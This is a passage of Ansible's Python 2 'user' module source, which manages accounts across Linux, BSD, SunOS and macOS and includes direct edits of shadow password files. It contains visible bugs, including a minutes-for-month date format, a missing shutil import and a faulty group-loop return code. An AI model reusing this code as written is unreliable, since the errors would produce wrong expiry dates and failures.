required: false
description:
- Optionally sets the user's primary group (takes a group name).
groups:
required: false
description:
- Puts the user in this comma-delimited list of groups. When set to
the empty string ('groups='), the user is removed from all groups
except the primary group.
append:
required: false
default: "no"
choices: [ "yes", "no" ]
description:
- If C(yes), will only add groups, not set them to just the list
in I(groups).
shell:
required: false
description:
- Optionally set the user's shell.
home:
required: false
description:
- Optionally set the user's home directory.
password:
required: false
description:
- Optionally set the user's password to this crypted value. See
the user example in the github examples directory for what this looks
like in a playbook. The `FAQ <http://docs.ansible.com/faq.html#how-do-i-generate-crypted-passwords-for-the-user-module>`_
contains details on various ways to generate these password values.
Note on Darwin system, this value has to be cleartext.
Beware of security issues.
state:
required: false
default: "present"
choices: [ present, absent ]
description:
- Whether the account should exist or not, taking action if the state is different from what is stated.
createhome:
required: false
default: "yes"
choices: [ "yes", "no" ]
description:
- Unless set to C(no), a home directory will be made for the user
when the account is created or if the home directory does not
exist.
move_home:
required: false
default: "no"
choices: [ "yes", "no" ]
description:
- If set to C(yes) when used with C(home=), attempt to move the
user's home directory to the specified directory if it isn't there
already.
system:
required: false
default: "no"
choices: [ "yes", "no" ]
description:
- When creating an account, setting this to C(yes) makes the user a
system account. This setting cannot be changed on existing users.
force:
required: false
default: "no"
choices: [ "yes", "no" ]
description:
- When used with C(state=absent), behavior is as with
C(userdel --force).
login_class:
required: false
description:
- Optionally sets the user's login class for FreeBSD, OpenBSD and NetBSD systems.
remove:
required: false
default: "no"
choices: [ "yes", "no" ]
description:
- When used with C(state=absent), behavior is as with
C(userdel --remove).
generate_ssh_key:
required: false
default: "no"
choices: [ "yes", "no" ]
version_added: "0.9"
description:
- Whether to generate a SSH key for the user in question.
This will B(not) overwrite an existing SSH key.
ssh_key_bits:
required: false
default: 2048
version_added: "0.9"
description:
- Optionally specify number of bits in SSH key to create.
ssh_key_type:
required: false
default: rsa
version_added: "0.9"
description:
- Optionally specify the type of SSH key to generate.
Available SSH key types will depend on implementation
present on target host.
ssh_key_file:
required: false
default: .ssh/id_rsa
version_added: "0.9"
description:
- Optionally specify the SSH key filename. If this is a relative
filename then it will be relative to the user's home directory.
ssh_key_comment:
required: false
default: ansible-generated on $HOSTNAME
version_added: "0.9"
description:
- Optionally define the comment for the SSH key.
ssh_key_passphrase:
required: false
version_added: "0.9"
description:
- Set a passphrase for the SSH key. If no
passphrase is provided, the SSH key will default to
having no passphrase.
update_password:
required: false
default: always
choices: ['always', 'on_create']
version_added: "1.3"
description:
- C(always) will update passwords if they differ. C(on_create) will only set the password for newly created users.
expires:
version_added: "1.9"
required: false
default: "None"
description:
- An expiry time for the user in epoch, it will be ignored on platforms that do not support this.
Currently supported on Linux and FreeBSD.
'''
EXAMPLES = '''
# Add the user 'johnd' with a specific uid and a primary group of 'admin'
- user: name=johnd comment="John Doe" uid=1040 group=admin
# Add the user 'james' with a bash shell, appending the group 'admins' and 'developers' to the user's groups
- user: name=james shell=/bin/bash groups=admins,developers append=yes
# Remove the user 'johnd'
- user: name=johnd state=absent remove=yes
# Create a 2048-bit SSH key for user jsmith in ~jsmith/.ssh/id_rsa
- user: name=jsmith generate_ssh_key=yes ssh_key_bits=2048 ssh_key_file=.ssh/id_rsa
# added a consultant whose account you want to expire
- user: name=james18 shell=/bin/zsh groups=developers expires=1422403387
'''
import os
import pwd
import grp
import syslog
import platform
import socket
import time
try:
import spwd
HAVE_SPWD=True
except:
HAVE_SPWD=False
class User(object):
"""
This is a generic User manipulation class that is subclassed
based on platform.
A subclass may wish to override the following action methods:-
- create_user()
- remove_user()
- modify_user()
- ssh_key_gen()
- ssh_key_fingerprint()
- user_exists()
All subclasses MUST define platform and distribution (which may be None).
"""
platform = 'Generic'
distribution = None
SHADOWFILE = '/etc/shadow'
DATE_FORMAT = '%Y-%M-%d'
def __new__(cls, *args, **kwargs):
return load_platform_subclass(User, args, kwargs)
def __init__(self, module):
self.module = module
self.state = module.params['state']
self.name = module.params['name']
self.uid = module.params['uid']
self.non_unique = module.params['non_unique']
self.group = module.params['group']
self.groups = module.params['groups']
self.comment = module.params['comment']
self.home = module.params['home']
self.shell = module.params['shell']
self.password = module.params['password']
self.force = module.params['force']
self.remove = module.params['remove']
self.createhome = module.params['createhome']
self.move_home = module.params['move_home']
self.system = module.params['system']
self.login_class = module.params['login_class']
self.append = module.params['append']
self.sshkeygen = module.params['generate_ssh_key']
self.ssh_bits = module.params['ssh_key_bits']
self.ssh_type = module.params['ssh_key_type']
self.ssh_comment = module.params['ssh_key_comment']
self.ssh_passphrase = module.params['ssh_key_passphrase']
self.update_password = module.params['update_password']
self.expires = None
if module.params['expires']:
try:
self.expires = time.gmtime(module.params['expires'])
except Exception,e:
module.fail_json("Invalid expires time %s: %s" %(self.expires, str(e)))
if module.params['ssh_key_file'] is not None:
self.ssh_file = module.params['ssh_key_file']
else:
self.ssh_file = os.path.join('.ssh', 'id_%s' % self.ssh_type)
# select whether we dump additional debug info through syslog
self.syslogging = False
def execute_command(self, cmd, use_unsafe_shell=False, data=None):
if self.syslogging:
syslog.openlog('ansible-%s' % os.path.basename(__file__))
syslog.syslog(syslog.LOG_NOTICE, 'Command %s' % '|'.join(cmd))
return self.module.run_command(cmd, use_unsafe_shell=use_unsafe_shell, data=data)
def remove_user_userdel(self):
cmd = [self.module.get_bin_path('userdel', True)]
if self.force:
cmd.append('-f')
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def create_user_useradd(self, command_name='useradd'):
cmd = [self.module.get_bin_path(command_name, True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
elif self.group_exists(self.name):
# use the -N option (no user group) if a group already
# exists with the same name as the user to prevent
# errors from useradd trying to create a group when
# USERGROUPS_ENAB is set in /etc/login.defs.
if os.path.exists('/etc/redhat-release'):
dist = platform.dist()
major_release = int(dist[1].split('.')[0])
if major_release <= 5:
cmd.append('-n')
else:
cmd.append('-N')
else:
cmd.append('-N')
if self.groups is not None and len(self.groups):
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.expires:
cmd.append('--expiredate')
cmd.append(time.strftime(self.DATE_FORMAT, self.expires))
if self.password is not None:
cmd.append('-p')
cmd.append(self.password)
if self.createhome:
cmd.append('-m')
else:
cmd.append('-M')
if self.system:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def _check_usermod_append(self):
# check if this version of usermod can append groups
usermod_path = self.module.get_bin_path('usermod', True)
# for some reason, usermod --help cannot be used by non root
# on RH/Fedora, due to lack of execute bit for others
if not os.access(usermod_path, os.X_OK):
return False
cmd = [usermod_path]
cmd.append('--help')
rc, data1, data2 = self.execute_command(cmd)
helpout = data1 + data2
# check if --append exists
lines = helpout.split('\n')
for line in lines:
if line.strip().startswith('-a, --append'):
return True
return False
def modify_user_usermod(self):
cmd = [self.module.get_bin_path('usermod', True)]
info = self.user_info()
has_append = self._check_usermod_append()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups_need_mod = False
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set(remove_existing=False)
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
if has_append:
cmd.append('-a')
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
if self.append and not has_append:
cmd.append('-A')
cmd.append(','.join(group_diff))
else:
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
cmd.append('-d')
cmd.append(self.home)
if self.move_home:
cmd.append('-m')
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.expires:
cmd.append('--expiredate')
cmd.append(time.strftime(self.DATE_FORMAT, self.expires))
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd.append('-p')
cmd.append(self.password)
# skip if no changes to be made
if len(cmd) == 1:
return (None, '', '')
elif self.module.check_mode:
return (0, '', '')
cmd.append(self.name)
return self.execute_command(cmd)
def group_exists(self,group):
try:
# Try group as a gid first
grp.getgrgid(int(group))
return True
except (ValueError, KeyError):
try:
grp.getgrnam(group)
return True
except KeyError:
return False
def group_info(self, group):
if not self.group_exists(group):
return False
try:
# Try group as a gid first
return list(grp.getgrgid(int(group)))
except (ValueError, KeyError):
return list(grp.getgrnam(group))
def get_groups_set(self, remove_existing=True):
if self.groups is None:
return None
info = self.user_info()
groups = set(filter(None, self.groups.split(',')))
for g in set(groups):
if not self.group_exists(g):
self.module.fail_json(msg="Group %s does not exist" % (g))
if info and remove_existing and self.group_info(g)[2] == info[3]:
groups.remove(g)
return groups
def user_group_membership(self):
groups = []
info = self.get_pwd_info()
for group in grp.getgrall():
if self.name in group.gr_mem and not info[3] == group.gr_gid:
groups.append(group[0])
return groups
def user_exists(self):
try:
if pwd.getpwnam(self.name):
return True
except KeyError:
return False
def get_pwd_info(self):
if not self.user_exists():
return False
return list(pwd.getpwnam(self.name))
def user_info(self):
if not self.user_exists():
return False
info = self.get_pwd_info()
if len(info[1]) == 1 or len(info[1]) == 0:
info[1] = self.user_password()
return info
def user_password(self):
passwd = ''
if HAVE_SPWD:
try:
passwd = spwd.getspnam(self.name)[1]
except KeyError:
return passwd
if not self.user_exists():
return passwd
else:
# Read shadow file for user's encrypted password string
if os.path.exists(self.SHADOWFILE) and os.access(self.SHADOWFILE, os.R_OK):
for line in open(self.SHADOWFILE).readlines():
if line.startswith('%s:' % self.name):
passwd = line.split(':')[1]
return passwd
def get_ssh_key_path(self):
info = self.user_info()
if os.path.isabs(self.ssh_file):
ssh_key_file = self.ssh_file
else:
ssh_key_file = os.path.join(info[5], self.ssh_file)
return ssh_key_file
def ssh_key_gen(self):
info = self.user_info()
if not os.path.exists(info[5]):
return (1, '', 'User %s home directory does not exist' % self.name)
ssh_key_file = self.get_ssh_key_path()
ssh_dir = os.path.dirname(ssh_key_file)
if not os.path.exists(ssh_dir):
try:
os.mkdir(ssh_dir, 0700)
os.chown(ssh_dir, info[2], info[3])
except OSError, e:
return (1, '', 'Failed to create %s: %s' % (ssh_dir, str(e)))
if os.path.exists(ssh_key_file):
return (None, 'Key already exists', '')
cmd = [self.module.get_bin_path('ssh-keygen', True)]
cmd.append('-t')
cmd.append(self.ssh_type)
cmd.append('-b')
cmd.append(self.ssh_bits)
cmd.append('-C')
cmd.append(self.ssh_comment)
cmd.append('-f')
cmd.append(ssh_key_file)
cmd.append('-N')
if self.ssh_passphrase is not None:
cmd.append(self.ssh_passphrase)
else:
cmd.append('')
(rc, out, err) = self.execute_command(cmd)
if rc == 0:
# If the keys were successfully created, we should be able
# to tweak ownership.
os.chown(ssh_key_file, info[2], info[3])
os.chown('%s.pub' % ssh_key_file, info[2], info[3])
return (rc, out, err)
def ssh_key_fingerprint(self):
ssh_key_file = self.get_ssh_key_path()
if not os.path.exists(ssh_key_file):
return (1, 'SSH Key file %s does not exist' % ssh_key_file, '')
cmd = [ self.module.get_bin_path('ssh-keygen', True) ]
cmd.append('-l')
cmd.append('-f')
cmd.append(ssh_key_file)
return self.execute_command(cmd)
def get_ssh_public_key(self):
ssh_public_key_file = '%s.pub' % self.get_ssh_key_path()
try:
f = open(ssh_public_key_file)
ssh_public_key = f.read().strip()
f.close()
except IOError:
return None
return ssh_public_key
def create_user(self):
# by default we use the create_user_useradd method
return self.create_user_useradd()
def remove_user(self):
# by default we use the remove_user_userdel method
return self.remove_user_userdel()
def modify_user(self):
# by default we use the modify_user_usermod method
return self.modify_user_usermod()
def create_homedir(self, path):
if not os.path.exists(path):
# use /etc/skel if possible
if os.path.exists('/etc/skel'):
try:
shutil.copytree('/etc/skel', path, symlinks=True)
except OSError, e:
self.module.exit_json(failed=True, msg="%s" % e)
else:
try:
os.makedirs(path)
except OSError, e:
self.module.exit_json(failed=True, msg="%s" % e)
def chown_homedir(self, uid, gid, path):
try:
os.chown(path, uid, gid)
for root, dirs, files in os.walk(path):
for d in dirs:
os.chown(path, uid, gid)
for f in files:
os.chown(os.path.join(root, f), uid, gid)
except OSError, e:
self.module.exit_json(failed=True, msg="%s" % e)
# ===========================================
class FreeBsdUser(User):
"""
This is a FreeBSD User manipulation class - it uses the pw command
to manipulate the user database, followed by the chpass command
to change the password.
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'FreeBSD'
distribution = None
SHADOWFILE = '/etc/master.passwd'
def remove_user(self):
cmd = [
self.module.get_bin_path('pw', True),
'userdel',
'-n',
self.name
]
if self.remove:
cmd.append('-r')
return self.execute_command(cmd)
def create_user(self):
cmd = [
self.module.get_bin_path('pw', True),
'useradd',
'-n',
self.name,
]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.createhome:
cmd.append('-m')
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
cmd.append('-L')
cmd.append(self.login_class)
if self.expires:
days =( time.mktime(self.expires) - time.time() ) / 86400
cmd.append('-e')
cmd.append(str(int(days)))
# system cannot be handled currently - should we error if its requested?
# create the user
(rc, out, err) = self.execute_command(cmd)
if rc is not None and rc != 0:
self.module.fail_json(name=self.name, msg=err, rc=rc)
# we have to set the password in a second command
if self.password is not None:
cmd = [
self.module.get_bin_path('chpass', True),
'-p',
self.password,
self.name
]
return self.execute_command(cmd)
return (rc, out, err)
def modify_user(self):
cmd = [
self.module.get_bin_path('pw', True),
'usermod',
'-n',
self.name
]
cmd_len = len(cmd)
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
if self.move_home:
cmd.append('-m')
cmd.append('-d')
cmd.append(self.home)
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
# find current login class
user_login_class = None
if os.path.exists(self.SHADOWFILE) and os.access(self.SHADOWFILE, os.R_OK):
for line in open(self.SHADOWFILE).readlines():
if line.startswith('%s:' % self.name):
user_login_class = line.split(':')[4]
# act only if login_class change
if self.login_class != user_login_class:
cmd.append('-L')
cmd.append(self.login_class)
if self.groups is not None:
current_groups = self.user_group_membership()
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
groups_need_mod = False
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
cmd.append('-G')
new_groups = groups
if self.append:
new_groups = groups | set(current_groups)
cmd.append(','.join(new_groups))
if self.expires:
days = ( time.mktime(self.expires) - time.time() ) / 86400
cmd.append('-e')
cmd.append(str(int(days)))
# modify the user if cmd will do anything
if cmd_len != len(cmd):
(rc, out, err) = self.execute_command(cmd)
if rc is not None and rc != 0:
self.module.fail_json(name=self.name, msg=err, rc=rc)
else:
(rc, out, err) = (None, '', '')
# we have to set the password in a second command
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd = [
self.module.get_bin_path('chpass', True),
'-p',
self.password,
self.name
]
return self.execute_command(cmd)
return (rc, out, err)
# ===========================================
class OpenBSDUser(User):
"""
This is a OpenBSD User manipulation class.
Main differences are that OpenBSD:-
- has no concept of "system" account.
- has no force delete user
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'OpenBSD'
distribution = None
SHADOWFILE = '/etc/master.passwd'
def create_user(self):
cmd = [self.module.get_bin_path('useradd', True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
cmd.append('-L')
cmd.append(self.login_class)
if self.password is not None:
cmd.append('-p')
cmd.append(self.password)
if self.createhome:
cmd.append('-m')
cmd.append(self.name)
return self.execute_command(cmd)
def remove_user_userdel(self):
cmd = [self.module.get_bin_path('userdel', True)]
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def modify_user(self):
cmd = [self.module.get_bin_path('usermod', True)]
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups_need_mod = False
groups_option = '-G'
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups_option = '-S'
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
cmd.append(groups_option)
cmd.append(','.join(groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
if self.move_home:
cmd.append('-m')
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
# find current login class
user_login_class = None
userinfo_cmd = [self.module.get_bin_path('userinfo', True), self.name]
(rc, out, err) = self.execute_command(userinfo_cmd)
for line in out.splitlines():
tokens = line.split()
if tokens[0] == 'class' and len(tokens) == 2:
user_login_class = tokens[1]
# act only if login_class change
if self.login_class != user_login_class:
cmd.append('-L')
cmd.append(self.login_class)
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd.append('-p')
cmd.append(self.password)
# skip if no changes to be made
if len(cmd) == 1:
return (None, '', '')
elif self.module.check_mode:
return (0, '', '')
cmd.append(self.name)
return self.execute_command(cmd)
# ===========================================
class NetBSDUser(User):
"""
This is a NetBSD User manipulation class.
Main differences are that NetBSD:-
- has no concept of "system" account.
- has no force delete user
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'NetBSD'
distribution = None
SHADOWFILE = '/etc/master.passwd'
def create_user(self):
cmd = [self.module.get_bin_path('useradd', True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
groups = self.get_groups_set()
if len(groups) > 16:
self.module.fail_json(msg="Too many groups (%d) NetBSD allows for 16 max." % len(groups))
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
cmd.append('-L')
cmd.append(self.login_class)
if self.password is not None:
cmd.append('-p')
cmd.append(self.password)
if self.createhome:
cmd.append('-m')
cmd.append(self.name)
return self.execute_command(cmd)
def remove_user_userdel(self):
cmd = [self.module.get_bin_path('userdel', True)]
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def modify_user(self):
cmd = [self.module.get_bin_path('usermod', True)]
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups_need_mod = False
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups = set(current_groups).union(groups)
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
if len(groups) > 16:
self.module.fail_json(msg="Too many groups (%d) NetBSD allows for 16 max." % len(groups))
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
if self.move_home:
cmd.append('-m')
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
cmd.append('-L')
cmd.append(self.login_class)
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd.append('-p')
cmd.append(self.password)
# skip if no changes to be made
if len(cmd) == 1:
return (None, '', '')
elif self.module.check_mode:
return (0, '', '')
cmd.append(self.name)
return self.execute_command(cmd)
# ===========================================
class SunOS(User):
"""
This is a SunOS User manipulation class - The main difference between
this class and the generic user class is that Solaris-type distros
don't support the concept of a "system" account and we need to
edit the /etc/shadow file manually to set a password. (Ugh)
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'SunOS'
distribution = None
SHADOWFILE = '/etc/shadow'
def remove_user(self):
cmd = [self.module.get_bin_path('userdel', True)]
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def create_user(self):
cmd = [self.module.get_bin_path('useradd', True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.createhome:
cmd.append('-m')
cmd.append(self.name)
if self.module.check_mode:
return (0, '', '')
else:
(rc, out, err) = self.execute_command(cmd)
if rc is not None and rc != 0:
self.module.fail_json(name=self.name, msg=err, rc=rc)
# we have to set the password by editing the /etc/shadow file
if self.password is not None:
try:
lines = []
for line in open(self.SHADOWFILE, 'rb').readlines():
fields = line.strip().split(':')
if not fields[0] == self.name:
lines.append(line)
continue
fields[1] = self.password
fields[2] = str(int(time.time() / 86400))
line = ':'.join(fields)
lines.append('%s\n' % line)
open(self.SHADOWFILE, 'w+').writelines(lines)
except Exception, err:
self.module.fail_json(msg="failed to update users password: %s" % str(err))
return (rc, out, err)
def modify_user_usermod(self):
cmd = [self.module.get_bin_path('usermod', True)]
cmd_len = len(cmd)
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
groups_need_mod = False
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
cmd.append('-G')
new_groups = groups
if self.append:
new_groups.update(current_groups)
cmd.append(','.join(new_groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
if self.move_home:
cmd.append('-m')
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.module.check_mode:
return (0, '', '')
else:
# modify the user if cmd will do anything
if cmd_len != len(cmd):
cmd.append(self.name)
(rc, out, err) = self.execute_command(cmd)
if rc is not None and rc != 0:
self.module.fail_json(name=self.name, msg=err, rc=rc)
else:
(rc, out, err) = (None, '', '')
# we have to set the password by editing the /etc/shadow file
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
try:
lines = []
for line in open(self.SHADOWFILE, 'rb').readlines():
fields = line.strip().split(':')
if not fields[0] == self.name:
lines.append(line)
continue
fields[1] = self.password
fields[2] = str(int(time.time() / 86400))
line = ':'.join(fields)
lines.append('%s\n' % line)
open(self.SHADOWFILE, 'w+').writelines(lines)
rc = 0
except Exception, err:
self.module.fail_json(msg="failed to update users password: %s" % str(err))
return (rc, out, err)
# ===========================================
class DarwinUser(User):
"""
This is a Darwin Mac OS X User manipulation class.
Main differences are that Darwin:-
- Handles accounts in a database managed by dscl(1)
- Has no useradd/groupadd
- Does not create home directories
- User password must be cleartext
- UID must be given
- System users must ben under 500
This overrides the following methods from the generic class:-
- user_exists()
- create_user()
- remove_user()
- modify_user()
"""
platform = 'Darwin'
distribution = None
SHADOWFILE = None
dscl_directory = '.'
fields = [
('comment', 'RealName'),
('home', 'NFSHomeDirectory'),
('shell', 'UserShell'),
('uid', 'UniqueID'),
('group', 'PrimaryGroupID'),
]
def _get_dscl(self):
return [ self.module.get_bin_path('dscl', True), self.dscl_directory ]
def _list_user_groups(self):
cmd = self._get_dscl()
cmd += [ '-search', '/Groups', 'GroupMembership', self.name ]
(rc, out, err) = self.execute_command(cmd)
groups = []
for line in out.splitlines():
if line.startswith(' ') or line.startswith(')'):
continue
groups.append(line.split()[0])
return groups
def _get_user_property(self, property):
'''Return user PROPERTY as given my dscl(1) read or None if not found.'''
cmd = self._get_dscl()
cmd += [ '-read', '/Users/%s' % self.name, property ]
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
return None
# from dscl(1)
# if property contains embedded spaces, the list will instead be
# displayed one entry per line, starting on the line after the key.
lines = out.splitlines()
#sys.stderr.write('*** |%s| %s -> %s\n' % (property, out, lines))
if len(lines) == 1:
return lines[0].split(': ')[1]
else:
if len(lines) > 2:
return '\n'.join([ lines[1].strip() ] + lines[2:])
else:
if len(lines) == 2:
return lines[1].strip()
else:
return None
def _change_user_password(self):
'''Change password for SELF.NAME against SELF.PASSWORD.
Please note that password must be cleatext.
'''
# some documentation on how is stored passwords on OSX:
# http://blog.lostpassword.com/2012/07/cracking-mac-os-x-lion-accounts-passwords/
# http://null-byte.wonderhowto.com/how-to/hack-mac-os-x-lion-passwords-0130036/
# http://pastebin.com/RYqxi7Ca
# on OSX 10.8+ hash is SALTED-SHA512-PBKDF2
# https://pythonhosted.org/passlib/lib/passlib.hash.pbkdf2_digest.html
# https://gist.github.com/nueh/8252572
cmd = self._get_dscl()
if self.password:
cmd += [ '-passwd', '/Users/%s' % self.name, self.password]
else:
cmd += [ '-create', '/Users/%s' % self.name, 'Password', '*']
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Error when changing password',
err=err, out=out, rc=rc)
return (rc, out, err)
def _make_group_numerical(self):
'''Convert SELF.GROUP to is stringed numerical value suitable for dscl.'''
if self.group is not None:
try:
self.group = grp.getgrnam(self.group).gr_gid
except KeyError:
self.module.fail_json(msg='Group "%s" not found. Try to create it first using "group" module.' % self.group)
# We need to pass a string to dscl
self.group = str(self.group)
def __modify_group(self, group, action):
'''Add or remove SELF.NAME to or from GROUP depending on ACTION.
ACTION can be 'add' or 'remove' otherwhise 'remove' is assumed. '''
if action == 'add':
option = '-a'
else:
option = '-d'
cmd = [ 'dseditgroup', '-o', 'edit', option, self.name,
'-t', 'user', group ]
(rc, out, err) = self.execute_command(cmd)
if rc != 0:
self.module.fail_json(msg='Cannot %s user "%s" to group "%s".'
% (action, self.name, group),
err=err, out=out, rc=rc)
return (rc, out, err)
def _modify_group(self):
'''Add or remove SELF.NAME to or from GROUP depending on ACTION.
ACTION can be 'add' or 'remove' otherwhise 'remove' is assumed. '''
rc = 0
out = ''
err = ''
changed = False
current = set(self._list_user_groups())
if self.groups is not None:
target = set(self.groups.split(','))
else:
target = set([])
for remove in current - target:
(_rc, _err, _out) = self.__modify_group(remove, 'delete')
rc += rc
out += _out
err += _err
changed = True
for add in target - current:
(_rc, _err, _out) = self.__modify_group(add, 'add')
rc += _rc
out += _out
err += _err
changed = True
return (rc, err, out, changed)
def _update_system_user(self):
